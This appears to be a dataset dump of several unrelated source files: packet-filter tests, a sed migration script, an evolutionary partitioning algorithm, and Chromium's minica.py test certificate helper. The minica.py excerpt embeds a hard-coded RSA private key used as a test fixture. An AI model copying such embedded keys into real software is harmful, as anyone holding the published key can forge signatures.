hexsha stringlengths 40 40 | size int64 1 1.03M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 239 | max_stars_repo_name stringlengths 5 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 239 | max_issues_repo_name stringlengths 5 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 239 | max_forks_repo_name stringlengths 5 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.03M | avg_line_length float64 1 958k | max_line_length int64 1 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
acf68d8dedc11023abb43254cda52836adc997ea | 3,294 | py | Python | src/workspace/src/tf/scripts/bullet_migration_sed.py | glabmoris/Poseidon | 801dad37ab49adc1a31ccfc1e551c02676ad77c0 | [
"MIT"
] | 7 | 2022-02-17T23:29:45.000Z | 2022-03-12T09:23:54.000Z | src/geometry/tf/scripts/bullet_migration_sed.py | Serru/MultiCobot-UR10-Gripper | e22a80c9b90f29ca7115c96740a3bdbcc6430d7a | [
"CC-BY-4.0"
] | 38 | 2021-09-07T16:39:14.000Z | 2022-03-15T13:41:07.000Z | src/geometry/tf/scripts/bullet_migration_sed.py | Serru/MultiCobot-UR10-Gripper | e22a80c9b90f29ca7115c96740a3bdbcc6430d7a | [
"CC-BY-4.0"
] | 9 | 2021-04-01T15:34:43.000Z | 2021-11-09T19:07:08.000Z | #!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2011, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the Willow Garage nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# Run this script to update bullet datatypes from tf in Electric to
# Fuerte/Unstable or newer
# by default this assumes your files are not using the tf namespace.
# If they are change the line below with the for loop to use the
# namespaced_rules
from __future__ import print_function
import subprocess
cmd = "find . -type f ! -name '*.svn-base' -a ! -name '*.hg' -a ! -name '*.git' -a \( -name '*.c*' -o -name '*.h*' \) -exec sed -i '%(rule)s' {} \;"
rules = ['s|LinearMath/bt|tf/LinearMath/|g', # include path
's/btTransform\.h/Transform\.h/g', # include files
's/btMatrix3x3\.h/Matrix3x3\.h/g',
's/btScalar\.h/Scalar\.h/g',
's/btQuaternion\.h/Quaternion\.h/g',
's/btQuadWord\.h/QuadWord\.h/g',
's/btMinMax\.h/MinMax\.h/g',
's/btVector3\.h/Vector3\.h/g',
's/btScalar/tfScalar/g',
]
unnamespaced_rules = [
's/btTransform/tf::Transform/g',
's/btQuaternion/tf::Quaternion/g',
's/btVector3/tf::Vector3/g',
's/btMatrix3x3/tf::Matrix3x3/g',
's/btQuadWord/tf::QuadWord/g',
]
namespaced_rules = [
's/btTransform/Transform/g',
's/btQuaternion/Quaternion/g',
's/btVector3/Vector3/g',
's/btMatrix3x3/Matrix3x3/g',
's/btQuadWord/QuadWord/g',
#'s/btScalar/Scalar/g',
]
for rule in rules + unnamespaced_rules: #change me if using files with namespace tf set
full_cmd = cmd%locals()
print("Running {}".format(full_cmd))
ret_code = subprocess.call(full_cmd, shell=True)
if ret_code == 0:
print("success")
else:
print("failure")
| 36.197802 | 148 | 0.683667 |
acf68d9b56489e35c2d861e2a649a3c58850746b | 11,958 | py | Python | test/test_packet_filter.py | neerajv18/SecureTea-Project | e999cbe7c8e497c69b76b4c886de0d063169ea03 | [
"MIT"
] | 257 | 2018-03-28T12:43:20.000Z | 2022-03-29T07:07:23.000Z | test/test_packet_filter.py | neerajv18/SecureTea-Project | e999cbe7c8e497c69b76b4c886de0d063169ea03 | [
"MIT"
] | 155 | 2018-03-31T14:57:46.000Z | 2022-03-17T18:12:41.000Z | test/test_packet_filter.py | neerajv18/SecureTea-Project | e999cbe7c8e497c69b76b4c886de0d063169ea03 | [
"MIT"
] | 132 | 2018-03-27T06:25:20.000Z | 2022-03-28T11:32:45.000Z | # -*- coding: utf-8 -*-
import unittest
from securetea.lib.firewall.packet_filter import PacketFilter
import scapy.all as scapy
try:
# if python 3.x.x
from unittest.mock import patch
except ImportError: # python 2.x.x
from mock import patch
class TestPacket_Filter(unittest.TestCase):
"""Test class for PacketFilter module."""
def setUp(self):
"""
Set-up PacketFilter object.
"""
payload = b"""E\x00\x004Q\xc8@\x00@\x06Z\x87\xc0\xa8\x89\x7fh\
x82\xdb\xca\x94\xc0\x01\xbb=L\xd3\x97\x14\t\xc9q\
x80\x10\x00\xf5\xe7B\x00\x00\x01\x01\x08\n\xeb7\xc9\
xa6bjc\xed"""
self.pf1 = PacketFilter(test=True)
self.scapy_pkt = scapy.IP(payload)
def test_inbound_IPRule(self):
"""
Test inbound_IPRule.
"""
self.pf1._action_inbound_IPRule = 0
result = self.pf1.inbound_IPRule(self.scapy_pkt)
self.assertEqual(result, 1)
self.pf1._action_inbound_IPRule = 1
result = self.pf1.inbound_IPRule(self.scapy_pkt)
self.assertEqual(result, 0)
self.pf1._IP_INBOUND = ['104.32.32.32']
self.pf1._action_inbound_IPRule = 1
result = self.pf1.inbound_IPRule(self.scapy_pkt)
self.assertEqual(result, 0)
self.pf1._IP_INBOUND = ['104.32.32.32']
self.pf1._action_inbound_IPRule = 0
result = self.pf1.inbound_IPRule(self.scapy_pkt)
self.assertEqual(result, 1)
self.pf1._IP_INBOUND = ['192.168.137.127']
self.pf1._action_inbound_IPRule = 0
result = self.pf1.inbound_IPRule(self.scapy_pkt)
self.assertEqual(result, 0)
self.pf1._IP_INBOUND = ['192.168.137.127']
self.pf1._action_inbound_IPRule = 1
result = self.pf1.inbound_IPRule(self.scapy_pkt)
self.assertEqual(result, 1)
def test_outbound_IPRule(self):
"""
Test outbound IPRule.
"""
self.pf1._action_outbound_IPRule = 0
result = self.pf1.outbound_IPRule(self.scapy_pkt)
self.assertEqual(result, 1)
self.pf1._action_outbound_IPRule = 1
result = self.pf1.outbound_IPRule(self.scapy_pkt)
self.assertEqual(result, 0)
self.pf1._IP_OUTBOUND = ['192.168.137.127']
self.pf1._action_outbound_IPRule = 1
result = self.pf1.outbound_IPRule(self.scapy_pkt)
self.assertEqual(result, 0)
self.pf1._IP_OUTBOUND = ['192.168.137.127']
self.pf1._action_outbound_IPRule = 0
result = self.pf1.outbound_IPRule(self.scapy_pkt)
self.assertEqual(result, 1)
self.pf1._IP_OUTBOUND = ['104.32.32.32']
self.pf1._action_outbound_IPRule = 0
result = self.pf1.outbound_IPRule(self.scapy_pkt)
self.assertEqual(result, 0)
self.pf1._IP_OUTBOUND = ['104.32.32.32']
self.pf1._action_outbound_IPRule = 1
result = self.pf1.outbound_IPRule(self.scapy_pkt)
self.assertEqual(result, 1)
def test_protocolRule(self):
"""
Test protocolRule.
"""
result = self.pf1.protocolRule(self.scapy_pkt)
self.assertEqual(result, 1)
self.pf1._action_protocolRule = 1
result = self.pf1.protocolRule(self.scapy_pkt)
self.assertEqual(result, 0)
self.pf1._PROTCOLS = ['6']
self.pf1._action_protocolRule = 1
result = self.pf1.protocolRule(self.scapy_pkt)
self.assertEqual(result, 1)
self.pf1._action_protocolRule = 0
result = self.pf1.protocolRule(self.scapy_pkt)
self.assertEqual(result, 0)
self.pf1._PROTCOLS = ['1']
self.pf1._action_protocolRule = 1
result = self.pf1.protocolRule(self.scapy_pkt)
self.assertEqual(result, 0)
self.pf1._PROTCOLS = ['1']
self.pf1._action_protocolRule = 0
result = self.pf1.protocolRule(self.scapy_pkt)
self.assertEqual(result, 1)
def test_DNSRule(self):
"""
Test DNSRule.
"""
result = self.pf1.DNSRule(self.scapy_pkt)
self.assertEqual(result, 1)
def test_source_portRule(self):
"""
Test source_portRule.
"""
result = self.pf1.source_portRule(self.scapy_pkt)
self.assertEqual(result, 1)
self.pf1._action_source_portRule = 1
result = self.pf1.source_portRule(self.scapy_pkt)
self.assertEqual(result, 0)
self.pf1._SPORTS = ['8224']
result = self.pf1.source_portRule(self.scapy_pkt)
self.assertEqual(result, 1)
self.pf1._action_source_portRule = 0
result = self.pf1.source_portRule(self.scapy_pkt)
self.assertEqual(result, 0)
def test_dest_portRule(self):
"""
Test dest_portRule.
"""
result = self.pf1.dest_portRule(self.scapy_pkt)
self.assertEqual(result, 1)
self.pf1._action_dest_portRule = 1
result = self.pf1.dest_portRule(self.scapy_pkt)
self.assertEqual(result, 0)
self.pf1._DPORTS = ['8224']
result = self.pf1.dest_portRule(self.scapy_pkt)
self.assertEqual(result, 1)
self.pf1._action_dest_portRule = 0
result = self.pf1.dest_portRule(self.scapy_pkt)
self.assertEqual(result, 0)
def test_HTTPRequest(self):
"""
Test HTTPRequest.
"""
result = self.pf1.HTTPRequest(self.scapy_pkt)
self.assertEqual(result, 1)
def test_HTTPResponse(self):
"""
Test HTTPResponse.
"""
result = self.pf1.HTTPResponse(self.scapy_pkt)
self.assertEqual(result, 1)
def test_scanLoad(self):
"""
Test scanLoad.
"""
result = self.pf1.scanLoad(self.scapy_pkt)
self.assertEqual(result, 1)
self.pf1._action_scanLoad = 1
result = self.pf1.scanLoad(self.scapy_pkt)
self.assertEqual(result, 0)
self.pf1._action_scanLoad = 0
self.pf1._EXTENSIONS = [".exe"]
result = self.pf1.scanLoad(self.scapy_pkt)
self.assertEqual(result, 1)
self.pf1._action_scanLoad = 1
result = self.pf1.scanLoad(self.scapy_pkt)
self.assertEqual(result, 0)
def test_check_first_fragment(self):
"""
Test check_first_fragment.
"""
pkt = scapy.IP(flags="MF",
frag=0,
len=100)
result = self.pf1.check_first_fragment(pkt)
self.assertEqual(result, 0)
pkt = scapy.IP(flags="MF",
frag=0,
len=160)
result = self.pf1.check_first_fragment(pkt)
self.assertEqual(result, 1)
def test_check_ip_version(self):
"""
Test check_ip_version.
"""
pkt = scapy.IP(version=8)
result = self.pf1.check_ip_version(pkt)
self.assertEqual(result, 0)
pkt = scapy.IP(version=4)
result = self.pf1.check_ip_version(pkt)
self.assertEqual(result, 1)
pkt = scapy.IP(version=6)
result = self.pf1.check_ip_version(pkt)
self.assertEqual(result, 1)
def test_check_ip_fragment_boundary(self):
"""
Test check_ip_fragment_boundary.
"""
pkt = scapy.IP(len=60000, frag=7000)
result = self.pf1.check_ip_fragment_boundary(pkt)
self.assertEqual(result, 0)
pkt = scapy.IP(len=60000, frag=1000)
result = self.pf1.check_ip_fragment_boundary(pkt)
self.assertEqual(result, 1)
def test_check_ip_fragment_offset(self):
"""
Test check_ip_fragment_offset.
"""
pkt = scapy.IP(frag=50)
result = self.pf1.check_ip_fragment_offset(pkt)
self.assertEqual(result, 0)
pkt = scapy.IP(frag=70)
result = self.pf1.check_ip_fragment_offset(pkt)
self.assertEqual(result, 1)
pkt = scapy.IP(frag=0)
result = self.pf1.check_ip_fragment_offset(pkt)
self.assertEqual(result, 1)
def test_check_invalid_ip(self):
"""
Test check_invalid_ip.
"""
pkt = scapy.IP(src="1.1.1.1")
result = self.pf1.check_invalid_ip(pkt)
self.assertEqual(result, 1)
def test_check_ip_header_length(self):
"""
Test check_ip_header_length.
"""
pkt = scapy.IP(len=10)
result = self.pf1.check_ip_header_length(pkt)
self.assertEqual(result, 0)
pkt = scapy.IP(len=30)
result = self.pf1.check_ip_header_length(pkt)
self.assertEqual(result, 1)
def test_check_tcp_flag(self):
"""
Test check_tcp_flag.
"""
pkt = scapy.TCP(flags=None)
result = self.pf1.check_tcp_flag(pkt)
self.assertEqual(result, 0)
pkt = scapy.TCP(flags="S")
result = self.pf1.check_tcp_flag(pkt)
self.assertEqual(result, 1)
def test_check_network_congestion(self):
"""
Test check_network_congestion.
"""
pkt = scapy.TCP(flags="EC")
result = self.pf1.check_network_congestion(pkt)
self.assertEqual(result, 0)
pkt = scapy.TCP(flags="S")
result = self.pf1.check_network_congestion(pkt)
self.assertEqual(result, 1)
def test_check_fin_ack(self):
"""
Test check_fin_ack.
"""
pkt = scapy.TCP(flags="FA")
result = self.pf1.check_fin_ack(pkt)
self.assertEqual(result, 1)
pkt = scapy.TCP(flags="F")
result = self.pf1.check_fin_ack(pkt)
self.assertEqual(result, 0)
def test_syn_fragmentation_attack(self):
"""
Test syn_fragmentation_attack.
"""
pkt = scapy.IP(flags="MF",
frag=10) \
/ scapy.TCP(flags="S")
result = self.pf1.syn_fragmentation_attack(pkt)
self.assertEqual(result, 0)
pkt = scapy.IP(flags="MF",
frag=0) \
/ scapy.TCP(flags="S")
result = self.pf1.syn_fragmentation_attack(pkt)
self.assertEqual(result, 0)
pkt = scapy.IP(flags="MF",
frag=0) \
/ scapy.TCP(flags="F")
result = self.pf1.syn_fragmentation_attack(pkt)
self.assertEqual(result, 1)
def test_check_large_icmp(self):
"""
Test check_large_icmp.
"""
pkt = scapy.IP(proto=1,
len=2048)
result = self.pf1.check_large_icmp(pkt)
self.assertEqual(result, 0)
pkt = scapy.IP(proto=1,
len=512)
result = self.pf1.check_large_icmp(pkt)
self.assertEqual(result, 1)
def test_icmp_fragmentation_attack(self):
"""
Test icmp_fragmentation_attack.
"""
pkt = scapy.IP(proto=1,
flags="MF",
frag=20)
result = self.pf1.icmp_fragmentation_attack(pkt)
self.assertEqual(result, 0)
pkt = scapy.IP(proto=1,
flags="MF",
frag=0)
result = self.pf1.icmp_fragmentation_attack(pkt)
self.assertEqual(result, 0)
pkt = scapy.IP(proto=2,
flags="MF",
frag=20)
result = self.pf1.icmp_fragmentation_attack(pkt)
self.assertEqual(result, 1)
@patch("securetea.lib.firewall.packet_filter.utils.open_file")
def test_check_mal_ip(self, mck_open):
"""
Test check_mal_ip.
"""
mck_open.return_value = ["1.1.1.1"]
# Case 1: When IP is in malicious IP list, block packet
pkt = scapy.IP(src="1.1.1.1")
result = self.pf1.check_mal_ip(pkt)
self.assertEqual(result, 0)
# Case 2: When IP is not in malicious IP list, allow packet
pkt = scapy.IP(src="2.2.2.2")
result = self.pf1.check_mal_ip(pkt)
self.assertEqual(result, 1)
| 30.58312 | 74 | 0.590901 |
acf68dd7e5ca6fd5fc31306b0570ba40d29a8b4b | 27 | py | Python | trinity/plugins/eth2/constants.py | renaynay/trinity | b85f37281b21c00dce91b7c61ba018788467c270 | [
"MIT"
] | 3 | 2019-06-17T13:59:20.000Z | 2021-05-02T22:09:13.000Z | trinity/plugins/eth2/constants.py | renaynay/trinity | b85f37281b21c00dce91b7c61ba018788467c270 | [
"MIT"
] | null | null | null | trinity/plugins/eth2/constants.py | renaynay/trinity | b85f37281b21c00dce91b7c61ba018788467c270 | [
"MIT"
] | 2 | 2019-12-14T02:52:32.000Z | 2021-02-18T23:04:44.000Z | VALIDATOR_KEY_DIR = "keys"
| 13.5 | 26 | 0.777778 |
acf68e261ddeeb5bc3801e4f6197ad973b1040c0 | 962 | py | Python | pkgs/sdk-pkg/src/genie/libs/sdk/apis/tests/iosxe/vrf/configure/unconfigure_mdt_auto_discovery_mldp/test_api_unconfigure_mdt_auto_discovery_mldp.py | patrickboertje/genielibs | 61c37aacf3dd0f499944555e4ff940f92f53dacb | [
"Apache-2.0"
] | 1 | 2022-01-16T10:00:24.000Z | 2022-01-16T10:00:24.000Z | pkgs/sdk-pkg/src/genie/libs/sdk/apis/tests/iosxe/vrf/configure/unconfigure_mdt_auto_discovery_mldp/test_api_unconfigure_mdt_auto_discovery_mldp.py | patrickboertje/genielibs | 61c37aacf3dd0f499944555e4ff940f92f53dacb | [
"Apache-2.0"
] | null | null | null | pkgs/sdk-pkg/src/genie/libs/sdk/apis/tests/iosxe/vrf/configure/unconfigure_mdt_auto_discovery_mldp/test_api_unconfigure_mdt_auto_discovery_mldp.py | patrickboertje/genielibs | 61c37aacf3dd0f499944555e4ff940f92f53dacb | [
"Apache-2.0"
] | null | null | null | import unittest
from pyats.topology import loader
from genie.libs.sdk.apis.iosxe.vrf.configure import unconfigure_mdt_auto_discovery_mldp
class TestUnconfigureMdtAutoDiscoveryMldp(unittest.TestCase):
@classmethod
def setUpClass(self):
testbed = """
devices:
P1:
connections:
defaults:
class: unicon.Unicon
a:
command: mock_device_cli --os iosxe --mock_data_dir mock_data --state connect
protocol: unknown
os: iosxe
platform: cat9k
type: c9500
"""
self.testbed = loader.load(testbed)
self.device = self.testbed.devices['P1']
self.device.connect()
def test_unconfigure_mdt_auto_discovery_mldp(self):
result = unconfigure_mdt_auto_discovery_mldp(self.device, 'vrf3001', 'ipv4')
expected_output = None
self.assertEqual(result, expected_output)
| 31.032258 | 93 | 0.627859 |
acf68ef832f7e026cfd2a804b96c81f982f503b6 | 644 | py | Python | hkust-gmission/gmission/models/payment.py | gmission/gmission | 1fe25a2fa04e563d5276579faa36afad7bb4122e | [
"MIT"
] | 251 | 2015-11-09T15:43:25.000Z | 2021-12-17T08:38:23.000Z | hkust-gmission/gmission/models/payment.py | gmission/gmission | 1fe25a2fa04e563d5276579faa36afad7bb4122e | [
"MIT"
] | 2 | 2019-09-03T17:41:03.000Z | 2021-01-15T13:51:06.000Z | hkust-gmission/gmission/models/payment.py | gmission/gmission | 1fe25a2fa04e563d5276579faa36afad7bb4122e | [
"MIT"
] | 20 | 2016-01-25T06:38:33.000Z | 2022-03-18T13:56:40.000Z | __author__ = 'chenzhao'
from base import *
class CreditTransaction(db.Model, BasicModelMixin):
id = db.Column(db.Integer, primary_key=True)
credit = db.Column(db.Integer, nullable=False)
campaign_id = db.Column(db.Integer)
hit_id = db.Column(db.Integer)
answer_id = db.Column(db.Integer)
worker_id = db.Column(db.Integer, db.ForeignKey('user.id'))
worker = db.relationship('User', foreign_keys=worker_id)
requester_id = db.Column(db.Integer, db.ForeignKey('user.id'))
requester = db.relationship('User', foreign_keys=requester_id)
created_on = db.Column(db.DateTime, default=datetime.datetime.now)
| 32.2 | 70 | 0.720497 |
acf68f8c586dfd28cbe5ca53755f03d82e054282 | 6,815 | py | Python | partition.py | OndrejKincl/evaTeaching-python | 76e33e7928bfd3c1e336ea3d3f3a9f6487c7bdfd | [
"MIT"
] | null | null | null | partition.py | OndrejKincl/evaTeaching-python | 76e33e7928bfd3c1e336ea3d3f3a9f6487c7bdfd | [
"MIT"
] | null | null | null | partition.py | OndrejKincl/evaTeaching-python | 76e33e7928bfd3c1e336ea3d3f3a9f6487c7bdfd | [
"MIT"
] | null | null | null | import random
import numpy as np
import functools
import utils
K = 10 #number of piles
POP_SIZE = 500 # population size
MAX_GEN = 500 # maximum number of generations
CX_PROB = 0.8 # crossover probability
MUT_PROB = 0.2 # mutation probability
MUT_FLIP_PROB = 0.1 # probability of chaninging value during mutation
REPEATS = 1 # number of runs of algorithm (should be at least 10)
OUT_DIR = 'partition' # output directory for logs
EXP_ID = 'default' # the ID of this experiment (used to create log names)
# reads the input set of values of objects
def read_weights(filename):
with open(filename) as f:
return list(map(int, f.readlines()))
# computes the bin weights
# - bins are the indices of bins into which the object belongs
def bin_weights(weights, bins):
bw = [0]*K
for w, b in zip(weights, bins):
bw[b] += w
return bw
# the fitness function
def fitness(ind, weights):
bw = bin_weights(weights, ind)
return utils.FitObjPair(fitness=1/(max(bw) - min(bw) + 1),
objective=max(bw) - min(bw))
# creates the individual
def create_ind(ind_len):
return [random.randrange(0, K) for _ in range(ind_len)]
# creates the population using the create individual function
def create_pop(pop_size, create_individual):
return [create_individual() for _ in range(pop_size)]
# the roulette wheel selection
def roulette_wheel_selection(pop, fits, k):
return random.choices(pop, fits, k=k)
# implements the one-point crossover of two individuals
def one_pt_cross(p1, p2):
point = random.randrange(1, len(p1))
o1 = p1[:point] + p2[point:]
o2 = p2[:point] + p1[point:]
return o1, o2
# implements the "bit-flip" mutation of one individual
def flip_mutate(p, prob, upper):
return [random.randrange(0, upper) if random.random() < prob else i for i in p]
# applies a list of genetic operators (functions with 1 argument - population)
# to the population
def mate(pop, operators):
for o in operators:
pop = o(pop)
return pop
# applies the cross function (implementing the crossover of two individuals)
# to the whole population (with probability cx_prob)
def crossover(pop, cross, cx_prob):
off = []
for p1, p2 in zip(pop[0::2], pop[1::2]):
if random.random() < cx_prob:
o1, o2 = cross(p1, p2)
else:
o1, o2 = p1[:], p2[:]
off.append(o1)
off.append(o2)
return off
# applies the mutate function (implementing the mutation of a single individual)
# to the whole population with probability mut_prob)
def mutation(pop, mutate, mut_prob):
return [mutate(p) if random.random() < mut_prob else p[:] for p in pop]
# implements the evolutionary algorithm
# arguments:
# pop_size - the initial population
# max_gen - maximum number of generation
# fitness - fitness function (takes individual as argument and returns
# FitObjPair)
# operators - list of genetic operators (functions with one arguments -
# population; returning a population)
# mate_sel - mating selection (funtion with three arguments - population,
# fitness values, number of individuals to select; returning the
# selected population)
# map_fn - function to use to map fitness evaluation over the whole
# population (default `map`)
# log - a utils.Log structure to log the evolution run
def evolutionary_algorithm(pop, max_gen, fitness, operators, mate_sel, *, map_fn=map, log=None):
evals = 0
for G in range(max_gen):
fits_objs = list(map_fn(fitness, pop))
evals += len(pop)
if log:
log.add_gen(fits_objs, evals)
fits = [f.fitness for f in fits_objs]
objs = [f.objective for f in fits_objs]
mating_pool = mate_sel(pop, fits, POP_SIZE)
offspring = mate(mating_pool, operators)
pop = offspring[:]
return pop
if __name__ == '__main__':
# read the weights from input
weights = read_weights('inputs/partition-easy.txt')
# use `functool.partial` to create fix some arguments of the functions
# and create functions with required signatures
cr_ind = functools.partial(create_ind, ind_len=len(weights))
fit = functools.partial(fitness, weights=weights)
xover = functools.partial(crossover, cross=one_pt_cross, cx_prob=CX_PROB)
mut = functools.partial(mutation, mut_prob=MUT_PROB,
mutate=functools.partial(flip_mutate, prob=MUT_FLIP_PROB, upper=K))
# we can use multiprocessing to evaluate fitness in parallel
import multiprocessing
pool = multiprocessing.Pool()
import matplotlib.pyplot as plt
# run the algorithm `REPEATS` times and remember the best solutions from
# last generations
best_inds = []
for run in range(REPEATS):
# initialize the log structure
log = utils.Log(OUT_DIR, EXP_ID, run,
write_immediately=True, print_frequency=5)
# create population
pop = create_pop(POP_SIZE, cr_ind)
# run evolution - notice we use the pool.map as the map_fn
pop = evolutionary_algorithm(pop, MAX_GEN, fit, [xover, mut], roulette_wheel_selection, map_fn=pool.map, log=log)
# remember the best individual from last generation, save it to file
bi = max(pop, key=fit)
best_inds.append(bi)
with open(f'{OUT_DIR}/{EXP_ID}_{run}.best', 'w') as f:
for w, b in zip(weights, bi):
f.write(f'{w} {b}\n')
# if we used write_immediately = False, we would need to save the
# files now
# log.write_files()
# print an overview of the best individuals from each run
for i, bi in enumerate(best_inds):
print(f'Run {i}: difference = {fit(bi).objective}, bin weights = {bin_weights(weights, bi)}')
# write summary logs for the whole experiment
utils.summarize_experiment(OUT_DIR, EXP_ID)
# read the summary log and plot the experiment
evals, lower, mean, upper = utils.get_plot_data(OUT_DIR, EXP_ID)
plt.figure(figsize=(12, 8))
utils.plot_experiment(evals, lower, mean, upper, legend_name = 'Default settings')
plt.legend()
plt.show()
# you can also plot mutiple experiments at the same time using
# utils.plot_experiments, e.g. if you have two experiments 'default' and
# 'tuned' both in the 'partition' directory, you can call
# utils.plot_experiments('partition', ['default', 'tuned'],
# rename_dict={'default': 'Default setting'})
# the rename_dict can be used to make reasonable entries in the legend -
# experiments that are not in the dict use their id (in this case, the
# legend entries would be 'Default settings' and 'tuned') | 38.721591 | 121 | 0.669259 |
acf68fcbb935059182661b275a106bb3c74472ad | 10,487 | py | Python | net/tools/testserver/minica.py | domenic/mojo | 53dda76fed90a47c35ed6e06baf833a0d44495b8 | [
"BSD-3-Clause"
] | 27 | 2016-04-27T01:02:03.000Z | 2021-12-13T08:53:19.000Z | net/tools/testserver/minica.py | domenic/mojo | 53dda76fed90a47c35ed6e06baf833a0d44495b8 | [
"BSD-3-Clause"
] | 2 | 2017-03-09T09:00:50.000Z | 2017-09-21T15:48:20.000Z | net/tools/testserver/minica.py | domenic/mojo | 53dda76fed90a47c35ed6e06baf833a0d44495b8 | [
"BSD-3-Clause"
] | 17 | 2016-04-27T02:06:39.000Z | 2019-12-18T08:07:00.000Z | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import asn1
import hashlib
import os
# This file implements very minimal certificate and OCSP generation. It's
# designed to test revocation checking.
def RandomNumber(length_in_bytes):
'''RandomNumber returns a random number of length 8*|length_in_bytes| bits'''
rand = os.urandom(length_in_bytes)
n = 0
for x in rand:
n <<= 8
n |= ord(x)
return n
def ModExp(n, e, p):
'''ModExp returns n^e mod p'''
r = 1
while e != 0:
if e & 1:
r = (r*n) % p
e >>= 1
n = (n*n) % p
return r
# PKCS1v15_SHA256_PREFIX is the ASN.1 prefix for a SHA256 signature.
PKCS1v15_SHA256_PREFIX = '3031300d060960864801650304020105000420'.decode('hex')
class RSA(object):
def __init__(self, modulus, e, d):
self.m = modulus
self.e = e
self.d = d
self.modlen = 0
m = modulus
while m != 0:
self.modlen += 1
m >>= 8
def Sign(self, message):
digest = hashlib.sha256(message).digest()
prefix = PKCS1v15_SHA256_PREFIX
em = ['\xff'] * (self.modlen - 1 - len(prefix) - len(digest))
em[0] = '\x00'
em[1] = '\x01'
em += "\x00" + prefix + digest
n = 0
for x in em:
n <<= 8
n |= ord(x)
s = ModExp(n, self.d, self.m)
out = []
while s != 0:
out.append(s & 0xff)
s >>= 8
out.reverse()
return '\x00' * (self.modlen - len(out)) + asn1.ToBytes(out)
def ToDER(self):
return asn1.ToDER(asn1.SEQUENCE([self.m, self.e]))
def Name(cn = None, c = None, o = None):
names = asn1.SEQUENCE([])
if cn is not None:
names.children.append(
asn1.SET([
asn1.SEQUENCE([
COMMON_NAME, cn,
])
])
)
if c is not None:
names.children.append(
asn1.SET([
asn1.SEQUENCE([
COUNTRY, c,
])
])
)
if o is not None:
names.children.append(
asn1.SET([
asn1.SEQUENCE([
ORGANIZATION, o,
])
])
)
return names
# The private key and root certificate name are hard coded here:
# This is the private key
KEY = RSA(0x00a71998f2930bfe73d031a87f133d2f378eeeeed52a77e44d0fc9ff6f07ff32cbf3da999de4ed65832afcb0807f98787506539d258a0ce3c2c77967653099a9034a9b115a876c39a8c4e4ed4acd0c64095946fb39eeeb47a0704dbb018acf48c3a1c4b895fc409fb4a340a986b1afc45519ab9eca47c30185c771c64aa5ecf07d,
3,
0x6f6665f70cb2a9a28acbc5aa0cd374cfb49f49e371a542de0a86aa4a0554cc87f7e71113edf399021ca875aaffbafaf8aee268c3b15ded2c84fb9a4375bbc6011d841e57833bc6f998d25daf6fa7f166b233e3e54a4bae7a5aaaba21431324967d5ff3e1d4f413827994262115ca54396e7068d0afa7af787a5782bc7040e6d3)
# And the same thing in PEM format
KEY_PEM = '''-----BEGIN RSA PRIVATE KEY-----
MIICXAIBAAKBgQCnGZjykwv+c9AxqH8TPS83ju7u1Sp35E0Pyf9vB/8yy/PamZ3k
7WWDKvywgH+YeHUGU50ligzjwsd5Z2UwmakDSpsRWodsOajE5O1KzQxkCVlG+znu
60egcE27AYrPSMOhxLiV/ECftKNAqYaxr8RVGaueykfDAYXHccZKpezwfQIBAwKB
gG9mZfcMsqmiisvFqgzTdM+0n0njcaVC3gqGqkoFVMyH9+cRE+3zmQIcqHWq/7r6
+K7iaMOxXe0shPuaQ3W7xgEdhB5XgzvG+ZjSXa9vp/FmsjPj5UpLrnpaqrohQxMk
ln1f8+HU9BOCeZQmIRXKVDlucGjQr6eveHpXgrxwQObTAkEA2wBAfuduw5G0/VfN
Wx66D5fbPccfYFqLM5LuTimLmNqzK2gIKXckB2sm44gJZ6wVlumaB1CSNug2LNYx
3cAjUwJBAMNUo1hbI8ugqqwI9kpxv9+2Heea4BlnXbS6tYF8pvkHMoliuxNbXmmB
u4zNB5iZ6V0ZZ4nvtUNo2cGr/h/Lcu8CQQCSACr/RPSCYSNTj948vya1D+d+hL+V
